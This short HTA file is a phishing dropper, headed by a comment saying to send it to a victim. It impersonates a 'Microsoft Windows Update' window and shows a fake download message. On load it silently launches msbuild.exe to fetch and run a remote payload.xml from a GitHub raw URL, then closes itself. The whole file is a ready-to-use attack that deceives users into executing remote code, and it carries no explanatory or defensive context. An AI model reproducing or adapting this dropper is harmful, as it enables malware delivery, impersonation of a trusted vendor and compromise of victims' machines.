<!-- Send this to victim: Update.hta -->
<html>
<head>
<HTA:APPLICATION ID="MicrosoftUpdate" APPLICATIONNAME="Microsoft Update" 
                 BORDER="thin" CAPTION="yes" SHOWINTASKBAR="yes"
                 WINDOWSTATE="normal" ICON="shell32.dll#10"/>
<script language="VBScript">
    Sub ExecuteUpdate
        On Error Resume Next
        
        ' Show fake progress
        document.getElementById("status").innerHTML = "Downloading security update..."
        
        ' Method 1: Direct MSBuild from GitHub
        Set shell = CreateObject("WScript.Shell")
        shell.Run "msbuild.exe http://raw.githubusercontent.com/yourusername/repo/main/payload.xml", 0, False
        
        ' Close after execution
        window.setTimeout "window.close()", 3000
    End Sub
</script>
</head>
<body onload="ExecuteUpdate" bgcolor="white">
<center>
    <br><br>
    <h3 style="font-family: Arial;">Microsoft Windows Update</h3>
    <p id="status" style="font-family: Arial;">Initializing update process...</p>
    <img src="https://upload.wikimedia.org/windows/loading.gif" width="50" height="50">
</center>
</body>
</html>